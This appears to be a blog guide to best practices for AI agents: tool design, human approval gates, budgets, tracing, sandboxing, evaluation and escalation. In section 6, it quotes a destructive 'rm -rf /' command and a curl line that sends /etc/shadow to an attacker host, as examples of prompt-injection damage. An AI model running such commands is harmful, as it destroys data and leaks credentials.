AI Agents Best Practices: Building Reliable, Safe, and Effective Agent Systems

AI agents — systems that use an LLM to reason, plan, and act in a loop — are among the most powerful patterns in modern AI engineering. They are also among the most fragile. A well-designed agent can autonomously resolve customer issues, write and ship code, or orchestrate multi-step research workflows. A poorly designed one will loop forever, burn through your API budget, take destructive actions, and produce confidently wrong results.

This post distils the best practices for building production-grade AI agents, catalogues the most common mistakes (and how to avoid them), and grounds everything in real-world examples and primary sources you can trace.


1. Start Simple, Then Layer Complexity

The single most important principle in agent design is incremental complexity. Most agent failures in practice stem not from missing capabilities, but from premature architectural complexity.

The Practice

Begin with the simplest architecture that could work:

  1. Single LLM call — Can prompt engineering solve this without an agent at all?
  2. Single-agent ReAct loop — One LLM with a few well-chosen tools in a reason → act → observe cycle.
  3. Multi-agent collaboration — Only when a single agent demonstrably fails due to context limits, role confusion, or task breadth.
Architecture ladder showing the progression from a single LLM call to a single-agent ReAct loop and finally to a multi-agent system.
Figure: Escalate from prompt-only flows to single-agent loops and only then to multi-agent orchestration when the simpler design clearly fails.

“The best agent is the simplest one that solves your problem.” — Harrison Chase, CEO of LangChain (LangChain Blog, 2024)

Why It Matters

Every additional agent, tool, or orchestration layer multiplies the failure surface. A multi-agent system with 4 agents making 10 tool calls each has 40 potential failure points in a single run. Anthropic’s research on agent design explicitly recommends “building agents with LLMs” by starting with augmented LLMs and only graduating to full agents when simpler patterns fall short.

Common Mistake: Over-Engineering from Day One

Teams frequently start with a multi-agent orchestration framework (CrewAI, AutoGen) before proving that a single ReAct agent can’t handle the task. This leads to:

  • Debugging nightmares — When something goes wrong in a 4-agent pipeline, isolating the failure requires tracing across multiple agent contexts.
  • Inflated costs — Each agent in the pipeline makes its own LLM calls; a 4-agent system easily costs 4–10× more than a single agent.
  • Slower iteration — Changing one agent’s behaviour can have cascading effects on others.

How to avoid it: Build a single-agent prototype first. Measure where it fails. Only add agents to address specific, documented shortcomings.

❌ Day 1: "We need a researcher agent, a planner agent, a coder agent,
          and a reviewer agent orchestrated by a supervisor."

✅ Day 1: "Let's build one ReAct agent with search and code-execution tools.
          We'll add specialization only if it can't handle the task."

2. Design Tools for the LLM, Not for Humans

Tools are the agent’s hands. The quality of your tool design is often the single biggest lever on agent reliability — more impactful than prompt engineering or model selection.

The Practice

Design every tool as if the LLM is a new developer reading the API documentation for the first time:

  • Clear, descriptive namessearch_customer_orders is better than query_db. The LLM uses the tool name and description to decide when to call it.
  • Narrow scope — One tool, one job. A get_order_status(order_id) tool is far more reliable than a generic run_sql(query) tool.
  • Structured inputs and outputs — Use explicit JSON schemas with required fields, enums, and descriptions. Return structured data, not free text.
  • Actionable error messages — Return errors that tell the agent what went wrong and what to try next, not generic “500 Internal Server Error.”
  • Idempotent where possible — Tools that can be safely retried reduce failure cascading.

Why It Matters

The Toolformer paper (Schick et al., 2023) demonstrated that LLMs select tools based primarily on their descriptions. Vague or overlapping tool descriptions cause the model to pick the wrong tool or call tools with incorrect parameters — a failure mode that compounds across multi-step agent runs.

OpenAI’s own function calling best practices emphasise that “the description field is the most important part of a function definition” and recommend writing descriptions “as if you are writing documentation for a junior developer.”

Example: Good vs. Bad Tool Design

{
  "bad_tool": {
    "name": "db",
    "description": "Query the database",
    "parameters": {
      "q": { "type": "string" }
    }
  },
  "good_tool": {
    "name": "get_customer_order_history",
    "description": "Retrieve the last N orders for a customer. Returns order ID, date, total, and status. Use this when the user asks about their past orders or order history.",
    "parameters": {
      "customer_id": {
        "type": "string",
        "description": "The unique customer identifier (e.g., 'CUST-12345')"
      },
      "limit": {
        "type": "integer",
        "description": "Maximum number of orders to return (default: 10, max: 50)",
        "default": 10
      },
      "status_filter": {
        "type": "string",
        "enum": ["all", "pending", "shipped", "delivered", "cancelled"],
        "description": "Filter orders by status. Use 'all' to return orders of any status.",
        "default": "all"
      }
    },
    "required": ["customer_id"]
  }
}

Common Mistake: Giving the Agent a Swiss-Army-Knife Tool

A single execute_sql(query) or run_code(code) tool gives the agent maximum flexibility — and maximum opportunity to cause damage. The agent can write arbitrary queries, access tables it shouldn’t, or construct malformed SQL that corrupts data.

How to avoid it: Decompose broad capabilities into narrow, purpose-built tools. If the agent needs to access order data, give it get_order(id), search_orders(customer_id, date_range), and cancel_order(order_id) — not raw database access.


3. Implement Human-in-the-Loop for High-Stakes Actions

Not every tool call should execute automatically. High-stakes actions require human approval before execution.

The Practice

Classify every tool into one of three tiers:

Tier Risk Level Examples Approval
Read-only Low Search, fetch data, read files Auto-execute
Reversible writes Medium Create draft, add to cart, stage changes Auto-execute with logging
Irreversible / high-impact High Send email, delete records, deploy code, process payment Require human approval

Implement a confirmation gate that pauses the agent loop before executing high-risk tools and presents the proposed action to the user for review.

Human approval gate where an agent proposes a sensitive action and a person can approve, reject, or modify it before execution.
Figure: A confirmation gate interrupts the loop before sensitive actions and gives a human reviewer the final say.

Why It Matters

OWASP’s Top 10 for LLM Applications identifies “Excessive Agency” as a critical risk: agents that autonomously perform actions with real-world consequences without adequate oversight. The risk is amplified by prompt injection — a malicious instruction embedded in a retrieved document or user input can hijack the agent into calling destructive tools.

Anthropic’s building effective agents guide explicitly recommends human-in-the-loop controls: “For high-stakes tasks, build in confirmation steps where the agent presents its planned actions for approval before executing.”

Example: Confirmation Gate in LangGraph

from langgraph.prebuilt import create_react_agent
from langgraph.checkpoint.memory import MemorySaver

# Tools that require human approval before execution
sensitive_tools = ["send_email", "delete_record", "process_refund"]

def human_approval_gate(tool_call):
    """Interrupt the agent loop for human review of sensitive actions."""
    if tool_call["name"] in sensitive_tools:
        print(f"\n⚠️  Agent wants to execute: {tool_call['name']}")
        print(f"   Arguments: {tool_call['args']}")
        approval = input("   Approve? (yes/no): ").strip().lower()
        if approval != "yes":
            return {"error": "Action rejected by human reviewer."}
    return None  # Auto-approve non-sensitive tools

agent = create_react_agent(
    model,
    tools,
    checkpointer=MemorySaver(),
    interrupt_before=sensitive_tools  # Pause before these tools
)

Common Mistake: “The Agent Is Autonomous, So No Human Oversight Needed”

Teams that deploy agents with full write access to production systems — email, databases, deployment pipelines — without any approval gates inevitably face an incident where the agent takes an unintended destructive action. The 2024 Air Canada chatbot case — where an AI agent made up a bereavement discount policy and the company was held liable — illustrates the real-world legal and financial consequences.

How to avoid it: Default to requiring approval for any action that modifies external state. Relax constraints only after thorough testing and with robust logging.


4. Set Budgets and Guardrails to Prevent Runaway Agents

Agents operate in a loop. Without explicit limits, they can loop indefinitely, consuming unbounded tokens and time.

The Practice

Enforce hard limits on every agent run:

  • Maximum steps — Cap the number of reasoning-action iterations (e.g., 15–25 steps for most tasks).
  • Maximum tokens — Set a per-run token budget to prevent cost explosions.
  • Maximum wall-clock time — Timeout runs that exceed a reasonable duration.
  • Maximum tool calls per tool — Prevent the agent from repeatedly calling the same failing tool.
  • Fallback behaviour — When a limit is hit, the agent should gracefully return a partial result or escalate to a human, not crash silently.
Budget guardrails diagram showing an agent loop bounded by limits for steps, tokens, runtime, and retries, with a fallback path to a partial result or human escalation.
Figure: Guardrails bound the agent loop with explicit limits and a graceful fallback instead of letting retries run forever.

Why It Matters

The SWE-bench analysis (Yang et al., 2024) showed that autonomous coding agents average 20–50 LLM calls per issue. Without caps, a confused agent can easily make 100+ calls on a single task, burning through hundreds of thousands of tokens. At GPT-4o pricing, a single runaway agent task can cost $5–$50 — and in a multi-tenant system, this adds up fast.

Harrison Chase, in his 2024 talk on agent reliability, noted that “the most common production agent bug is an infinite loop where the agent keeps retrying the same failing tool call.” Budget limits are the simplest and most effective mitigation.

Example: Budget Configuration

from langgraph.prebuilt import create_react_agent

agent = create_react_agent(
    model=llm,
    tools=tools,
    # Hard limits to prevent runaway behaviour
    recursion_limit=25,         # Max 25 reasoning-action iterations
)

# Application-level timeout and token tracking
import asyncio

async def run_with_budget(agent, input_message, max_seconds=120, max_tokens=50000):
    token_count = 0
    try:
        result = await asyncio.wait_for(
            agent.ainvoke({"messages": [{"role": "user", "content": input_message}]}),
            timeout=max_seconds
        )
        return result
    except asyncio.TimeoutError:
        return {"error": f"Agent timed out after {max_seconds}s. Escalating to human."}

Common Mistake: No Limits on Agent Loops

Without explicit budgets, agents that encounter ambiguous tasks or flaky tools will retry indefinitely. This manifests as:

  • Cost spikes — A single agent run consuming $10–$50 in API calls.
  • Latency blowouts — Users waiting 5+ minutes for a response that should take 15 seconds.
  • Cascading failures — A stuck agent holding resources that block other requests.

How to avoid it: Set conservative limits from day one. A 25-step limit and 60-second timeout are reasonable starting points for most use cases. Monitor and adjust based on production telemetry.


5. Invest in Observability and Tracing

You cannot improve what you cannot see. Agent observability is not optional — it is prerequisite to reliability.

The Practice

Log every step of the agent loop with full fidelity:

What to Log Why
LLM reasoning traces (chain-of-thought) Understand why the agent chose an action
Tool calls (name, arguments) Audit what the agent did
Tool outputs (full response) Trace data flow and identify bad inputs
Token counts per step Cost attribution and budget monitoring
Latency per step Identify bottlenecks
Final outcome (success/failure/timeout) Measure overall reliability
Error messages and retries Debug failure patterns
Observability trace diagram showing an agent run broken into logged steps including reasoning, tool calls, outputs, and the final outcome with attached metrics.
Figure: A useful agent trace records the full trajectory — reasoning, actions, outputs, timing, and outcome — not just the final answer.

Use a dedicated LLM observability platform rather than ad-hoc logging:

  • LangSmith — Full trajectory tracing, evaluation datasets, and prompt versioning for LangChain/LangGraph agents.
  • Arize Phoenix — Open-source LLM observability with trace visualization and embedding drift monitoring.
  • Braintrust — Evaluation and logging platform with support for agent trajectory scoring.

Why It Matters

The AgentBench paper (Liu et al., 2024) highlighted that agent evaluation is fundamentally different from traditional NLP evaluation. Success depends on the entire trajectory, not just the final answer. An agent that produces the right answer via a dangerous or wasteful path is still a failure from a production standpoint.

Chip Huyen, in AI Engineering (O’Reilly, 2025), dedicates an entire chapter to LLM application observability, arguing that “without tracing, you are debugging LLM applications with a blindfold on.” This applies doubly to agents, where a single run can span dozens of intermediate states.

Common Mistake: Logging Only the Final Answer

Teams that log only the agent’s final output lose all visibility into the reasoning process. When the agent produces a wrong answer or takes an unexpected action, there is no trail to diagnose the root cause — was it a bad tool call? A hallucinated plan? A retrieval failure?

How to avoid it: Instrument every step from day one. Treat agent traces like distributed system traces — each step is a “span” in the trajectory. Platforms like LangSmith render these as visual timelines, making debugging tractable.

[Step 1] LLM Reasoning: "The user wants to cancel order ORD-789. I need to look up the order first."
[Step 2] Tool Call: get_order(order_id="ORD-789")
[Step 3] Tool Output: {"status": "shipped", "carrier": "FedEx", "tracking": "FX123456"}
[Step 4] LLM Reasoning: "The order is already shipped. I should inform the user and offer alternatives."
[Step 5] Final Answer: "Order ORD-789 has already shipped via FedEx (tracking: FX123456)..."
         ✅ Success | 5 steps | 1,847 tokens | 2.3s

6. Sandbox All Code Execution

If your agent executes code — and many do — that code must run in an isolated sandbox, never on the host system.

The Practice

  • Use containerized environments — Docker, E2B, or Firecracker microVMs provide process-level isolation.
  • Restrict network access — The sandbox should have no access to internal networks, production databases, or cloud metadata services unless explicitly granted.
  • Restrict filesystem access — Mount only the directories the agent needs, read-only where possible.
  • Time-limit execution — Kill processes that exceed a wall-clock timeout (e.g., 30 seconds for code execution).
  • Drop privileges — Run as a non-root user with minimal permissions.
Sandbox boundary diagram separating the host system from an isolated execution container with restricted network, filesystem, and time limits for agent-generated code.
Figure: Agent-generated code should cross a hard isolation boundary into a constrained sandbox instead of running on the host.

Why It Matters

The OWASP Top 10 for LLM Applications lists “Insecure Output Handling” and “Excessive Agency” as top risks. An agent that generates and executes code on the host system is one prompt injection away from data exfiltration, resource abuse, or system compromise.

Simon Willison, a leading voice on LLM security, has extensively documented how prompt injection in multi-modal and tool-using LLMs can lead to arbitrary code execution when sandboxing is absent.

Example: Sandboxed Code Execution with E2B

from e2b_code_interpreter import Sandbox

# Create an isolated sandbox for the agent's code execution
with Sandbox() as sandbox:
    # The agent generates this code based on user request
    agent_code = """
    import pandas as pd
    df = pd.read_csv('/uploaded/sales_data.csv')
    summary = df.groupby('region')['revenue'].sum().sort_values(ascending=False)
    print(summary.to_markdown())
    """

    # Execute in the sandbox — isolated from host system
    execution = sandbox.run_code(agent_code)
    print(execution.text)  # Safe output
    # Host filesystem, network, and processes are not accessible

Common Mistake: Running Agent-Generated Code on the Host

Teams that use subprocess.run() or exec() to execute agent-generated code on the production host are creating a critical security vulnerability. A single prompt injection or hallucinated command can:

  • Delete files (rm -rf /)
  • Exfiltrate secrets (curl attacker.com -d @/etc/shadow)
  • Install malware or crypto miners
  • Pivot to other internal systems

How to avoid it: Never execute agent-generated code outside a sandbox. Treat all agent-generated code as untrusted input — because it is.


7. Use Structured Outputs for Deterministic Tool Calls

When agents communicate with tools and downstream systems, structured outputs eliminate an entire class of parsing failures.

The Practice

Force the LLM to produce tool calls and intermediate results as validated JSON conforming to explicit schemas. Use:

  • OpenAI Structured Outputs — Guarantees JSON conformance via constrained decoding.
  • Instructor — Pydantic-based structured output extraction with automatic retries.
  • Outlines — Grammar-constrained generation for open-source models.

Why It Matters

In an agent loop, the LLM’s output at each step is parsed to determine the next action. If the output is malformed — missing a required field, using the wrong type, or including unexpected text — the entire loop breaks. In production, Jason Liu (creator of Instructor) reports that structured output enforcement reduces agent tool-call failures by 30–50% compared to freeform text parsing.

Example: Structured Tool Call with Instructor

import instructor
from openai import OpenAI
from pydantic import BaseModel, Field
from enum import Enum

class ToolChoice(str, Enum):
    SEARCH = "search_knowledge_base"
    GET_ORDER = "get_order"
    ESCALATE = "escalate_to_human"

class AgentAction(BaseModel):
    """The agent's next action, validated against a strict schema."""
    reasoning: str = Field(description="The agent's chain-of-thought reasoning for choosing this action")
    tool: ToolChoice = Field(description="Which tool to call next")
    arguments: dict = Field(description="Arguments to pass to the selected tool")

client = instructor.from_openai(OpenAI())

action = client.chat.completions.create(
    model="gpt-4o",
    response_model=AgentAction,
    messages=[
        {"role": "system", "content": "You are a customer service agent. Select the appropriate tool."},
        {"role": "user", "content": "Where is my order ORD-456?"}
    ]
)
# action.tool is guaranteed to be a valid ToolChoice enum value
# action.arguments is guaranteed to be a dict
# No parsing errors, no malformed JSON

Common Mistake: Parsing Agent Output with Regex

Teams that extract tool calls from freeform LLM text using regex or string matching are building on sand. Model output format varies between calls, models, and versions. A single extra newline, misplaced comma, or markdown formatting artifact breaks the parser.

How to avoid it: Use constrained decoding or a structured output library. Never rely on the LLM to “usually” produce valid JSON — enforce it mechanically.


8. Evaluate Agents on Trajectories, Not Just Final Answers

Traditional evaluation (comparing output to a gold-standard answer) is insufficient for agents. Two agents can produce the same correct answer via wildly different paths — one efficient and safe, the other wasteful and risky.

The Practice

Evaluate agents on multiple dimensions:

Dimension What to Measure Example Metric
Correctness Is the final answer right? Exact match, F1, human rating
Efficiency How many steps/tokens did it take? Steps to completion, total tokens
Tool accuracy Did it call the right tools with the right args? Tool call precision/recall
Safety Did it avoid forbidden actions? Violation count
Recovery Did it handle errors gracefully? Recovery rate after tool failures
Cost What did the run cost? Total API spend per task

Build evaluation datasets of (task, expected trajectory, expected output) triples. Run the agent against this dataset regularly — ideally in CI/CD — to catch regressions.

Why It Matters

The AgentBench framework (Liu et al., 2024) demonstrated that evaluating agents on final answers alone misses critical failure modes. An agent that produces the right answer by reading a confidential file it shouldn’t have accessed is a security failure, not a success. The SWE-bench benchmark evaluates on full task resolution — the agent must produce a working patch, not just a plausible answer.

Chip Huyen in AI Engineering (O’Reilly, 2025) emphasises that “agent evaluation must be trajectory-aware” and recommends building evaluation harnesses that score intermediate steps, not just outcomes.

Common Mistake: “It Worked on My Demo”

A live demo where the agent completes a task is not an evaluation. Without a systematic dataset covering edge cases, error conditions, and adversarial inputs, you have no idea what your agent’s real failure rate is. Devin’s SWE-bench results — 13.86% resolution rate — illustrate that even state-of-the-art agents fail on the majority of tasks.

How to avoid it: Build a benchmark of 50–200 representative tasks from your domain. Run the agent against it weekly. Track pass rate, average steps, average cost, and safety violations over time. Treat it like a test suite.


9. Manage Context Window Carefully

The LLM’s context window is a scarce resource. In an agent loop, every reasoning step, tool call, and tool output accumulates in the context. Left unmanaged, the context fills up, performance degrades, and the agent starts losing track of earlier information.

The Practice

  • Summarize tool outputs — If a tool returns 5,000 tokens of raw data, summarize it to the relevant 200 tokens before appending to context.
  • Truncate conversation history — Keep the most recent N turns in full and summarize older turns.
  • Use retrieval over context — Instead of stuffing all relevant documents into context, store them externally and retrieve only what’s needed per step.
  • Reserve tokens for reasoning — If your model has a 128k context window, don’t fill 127k with data and leave only 1k for reasoning. A good rule of thumb is to reserve at least 20–30% of the window for the model’s own reasoning and output.

Why It Matters

The “Lost in the Middle” paper (Liu et al., 2024) demonstrated that LLMs perform significantly worse when critical information is placed in the middle of a long context — they attend best to the beginning and end. For agents, this means that tool outputs from early steps can get “buried” as the context grows, leading to the agent forgetting its own earlier findings.

MemGPT (Packer et al., 2023) addresses this by treating the context window like virtual memory — paging information in and out as needed — demonstrating that active context management is essential for long-running agent tasks.

Common Mistake: Appending Everything to Context

The default behaviour in most agent frameworks is to append every tool call and tool output to the conversation history verbatim. For tools that return large JSON payloads, database query results, or full web pages, this fills the context window in a few steps, causing:

  • Context overflow — The run fails when the accumulated context exceeds the model’s window.
  • Attention degradation — The model “forgets” important earlier context as the window fills.
  • Increased cost — Every subsequent LLM call includes the full context, multiplying token costs.

How to avoid it: Implement a context management strategy from the start. Summarize large tool outputs, drop irrelevant history, and use retrieval for information the agent might need later.


10. Implement Graceful Failure and Escalation

Agents will fail. The question is whether they fail gracefully — informing the user and escalating to a human — or silently — producing wrong results or hanging indefinitely.

The Practice

Design explicit failure modes:

  • Tool failure — If a tool call fails after 2–3 retries, stop retrying. Return a clear error message and either try an alternative approach or escalate.
  • Confidence signals — When the agent is uncertain, it should express uncertainty rather than confabulate. Instruct the agent in its system prompt: “If you are not confident in your answer, say so and suggest the user contact support.”
  • Escalation path — Every production agent should have a defined handoff to a human agent. This is not a failure — it is a design feature.
  • Partial results — When hitting a budget or time limit, return whatever useful work was completed rather than nothing.

Why It Matters

Klarna’s AI assistant handles two-thirds of customer service chats — but the remaining third is seamlessly escalated to human agents. This graceful escalation is a key part of why the system succeeds: it doesn’t try to handle cases it can’t. Sierra AI builds this pattern into every customer service agent they deploy — the agent knows when to stop and hand off.

In AI Engineering (O’Reilly, 2025), Chip Huyen notes that “the most reliable AI systems are those that know what they don’t know” and recommends designing explicit uncertainty signaling and escalation paths as first-class features, not afterthoughts.

Common Mistake: Letting the Agent Confabulate When It’s Stuck

When an agent can’t find the answer or a tool fails, the default LLM behaviour is to generate a plausible-sounding but fabricated response. In a customer service context, this means the agent invents policies, makes up order numbers, or provides incorrect instructions — leading to customer harm and legal liability.

How to avoid it: Add explicit instructions in the agent’s system prompt to acknowledge uncertainty. Validate critical facts against tool outputs before presenting them to the user. Implement a fallback that routes to a human when confidence is low.

System prompt excerpt:
"If you cannot find the information needed to answer the user's question
after using your available tools, do NOT make up an answer. Instead, respond:
'I wasn't able to find that information. Let me connect you with a team member
who can help.' Then call the escalate_to_human tool."

Real-World Examples: Best Practices in Action

GitHub Copilot Agent Mode

GitHub Copilot’s agent mode embodies several best practices simultaneously:

  • Starts simple — Begins by reading relevant files and understanding the context before making changes.
  • Narrow, well-designed tools — Has specific tools for file reading, file editing, terminal commands, and code search — not a single “do anything” tool.
  • Human-in-the-loop — Requires user approval before executing terminal commands that could modify the system.
  • Observability — Each step (reasoning, tool call, output) is visible to the user in the IDE.
  • Budget limits — Operates within the IDE session context, preventing unbounded execution.
  • Graceful failure — When it encounters errors, it reports them and suggests next steps rather than silently failing.

Klarna AI Assistant

Klarna’s production agent demonstrates enterprise-grade best practices:

  • Scoped tools — The agent has specific tools for order lookup, refund processing, and FAQ retrieval — not raw database access.
  • Human escalation — Seamlessly hands off to human agents for complex cases, maintaining conversation context during the handoff.
  • Structured outputs — Responses follow consistent templates for refund confirmations, status updates, and policy explanations.
  • Guardrails — The agent cannot offer unauthorized discounts, access accounts without verification, or perform actions outside its defined scope.
  • Evaluation — Klarna tracks resolution rate, customer satisfaction (CSAT), and escalation rate continuously, catching regressions early.

Voyager (Minecraft Agent)

The Voyager research agent demonstrates best practices in autonomous learning:

  • Incremental complexity — Starts with simple goals (collect wood) and progressively tackles harder challenges (build structures, navigate caves).
  • Skill library — Reusable, tested code snippets stored for retrieval, implementing the “structured outputs” principle for action code.
  • Self-verification — After executing an action, Voyager checks whether it succeeded and iterates if not — embodying the “evaluate trajectories” principle.
  • Context management — Only retrieves relevant skills from its library for the current task, rather than loading everything into context.

Best Practices Checklist

Use this as a quick reference when designing and reviewing agent systems:

# Practice Key Question
1 Start simple Can a single agent with basic tools solve this?
2 Design tools for the LLM Are tool names, descriptions, and schemas crystal clear?
3 Human-in-the-loop Are high-stakes actions gated on human approval?
4 Budgets and guardrails Are step, token, and time limits enforced?
5 Observability Is every step of every run logged and traceable?
6 Sandbox code execution Is all generated code running in an isolated environment?
7 Structured outputs Are tool calls validated against schemas, not parsed from freeform text?
8 Trajectory evaluation Are agents tested on full trajectories, not just final answers?
9 Context management Is the context window actively managed and summarized?
10 Graceful failure Does the agent know when to stop and escalate to a human?

References & Further Reading

Foundational Papers

  1. ReAct — Yao, S. et al. “ReAct: Synergizing Reasoning and Acting in Language Models”, ICLR 2023. The reasoning-action loop pattern that underpins most modern agent architectures.
  2. Toolformer — Schick, T. et al. “Toolformer: Language Models Can Teach Themselves to Use Tools”, NeurIPS 2023. Demonstrates that LLMs can learn when and how to call tools — making tool design critical to agent performance.
  3. Reflexion — Shinn, N. et al. “Reflexion: Language Agents with Verbal Reinforcement Learning”, NeurIPS 2023. Agents that improve by reflecting on their own failures — a key self-correction best practice.
  4. Voyager — Wang, G. et al. “Voyager: An Open-Ended Embodied Agent with Large Language Models”, 2023. Demonstrates skill libraries, self-verification, and incremental complexity in an autonomous agent.
  5. MemGPT — Packer, C. et al. “MemGPT: Towards LLMs as Operating Systems”, 2023. Virtual memory management for agents — the foundation of context management best practices.
  6. Lost in the Middle — Liu, N.F. et al. “Lost in the Middle: How Language Models Use Long Contexts”, TACL 2024. Reveals attention degradation in long contexts, motivating active context management for agents.

Evaluation and Benchmarks

  1. AgentBench — Liu, X. et al. “AgentBench: Evaluating LLMs as Agents”, ICLR 2024. Comprehensive benchmark demonstrating why agents must be evaluated on trajectories, not just final outputs.
  2. SWE-bench — Jimenez, C.E. et al. “SWE-bench: Can Language Models Resolve Real-World GitHub Issues?”, ICLR 2024. The gold-standard benchmark for coding agents — exposes the reliability gap in autonomous software engineering.
  3. SWE-Agent — Yang, J. et al. “SWE-agent: Agent-Computer Interfaces Enable Automated Software Engineering”, 2024. Reveals the cost and step count of autonomous coding agents, motivating budget limits.

Multi-Agent Systems

  1. AutoGen — Wu, Q. et al. “AutoGen: Enabling Next-Gen LLM Applications via Multi-Agent Conversation”, 2023. Microsoft’s multi-agent framework — demonstrates when multi-agent architectures add value and when they add complexity.
  2. Agent Survey — Wang, L. et al. “A Survey on Large Language Model based Autonomous Agents”, 2023. Comprehensive overview of agent architectures, planning strategies, and memory designs.
  3. Chain-of-Thought Prompting — Wei, J. et al. “Chain-of-Thought Prompting Elicits Reasoning in Large Language Models”, NeurIPS 2022. The reasoning technique that powers agent planning modules.

Safety and Security

  1. OWASP Top 10 for LLM ApplicationsOWASP Foundation, 2023–2025. Industry-standard security risks for LLM applications, including “Excessive Agency” — essential reading for anyone deploying agents.
  2. Prompt Injection — Greshake, K. et al. “Not What You’ve Signed Up For: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection”, 2023. Demonstrates how prompt injection can hijack agent tool calls — motivating sandboxing and approval gates.

Industry Guides

  1. Building Effective Agents — Anthropic, “Building effective agents”, 2024. Anthropic’s practical guide to agent design — recommends starting simple, human-in-the-loop, and incremental complexity.
  2. OpenAI Function Calling Best Practices — OpenAI, “Function calling guide”, 2024. Official guidance on tool design, descriptions, and structured outputs for agent systems.

Books

  1. Stuart Russell & Peter Norvig — Artificial Intelligence: A Modern Approach, 4th ed., Pearson, 2020. The definitive textbook on intelligent agents. Chapters 2–4 define the agent concept, environment types, and rational behaviour that LLM agents inherit.
  2. Chip Huyen — AI Engineering, O’Reilly, 2025. Covers building LLM applications in production, including agent architectures, observability, evaluation, and deployment patterns. The most relevant production guide for agent builders.
  3. Jay Alammar & Maarten Grootendorst — Hands-On Large Language Models, O’Reilly, 2024. Practical guide with code examples covering prompt engineering, RAG, tool use, and the agent patterns these best practices build on.
  4. Sebastian Raschka — Build a Large Language Model (From Scratch), Manning, 2024. Understand the LLM internals — pre-training, fine-tuning, RLHF — that power the reasoning engine at the core of every agent.
  5. Harrison Chase & Jacob Lee — LangChain Documentation & Guides, LangChain, 2023–2026. The most widely adopted framework for building agents, with tutorials on ReAct, tool design, and multi-agent patterns.

Tools & Platforms

  1. LangSmith — Observability, tracing, and evaluation platform for LLM applications and agents. The go-to for trajectory-level debugging.
  2. Arize Phoenix — Open-source LLM observability with trace visualization and embedding analysis.
  3. Braintrust — Evaluation and logging platform with support for agent trajectory scoring and regression detection.
  4. E2B — Sandboxed cloud environments for safe agent code execution — the standard for code-executing agents.
  5. Instructor — Pydantic-based structured output extraction for LLMs. Essential for reliable agent-tool communication.
  6. Outlines — Grammar-constrained generation for open-source models. Guarantees structured output without post-hoc parsing.
  7. Guardrails AI — Open-source framework for adding input/output validation, safety checks, and format enforcement to LLM applications.
  8. NVIDIA NeMo Guardrails — Programmable guardrails for controlling agent behaviour in conversational systems.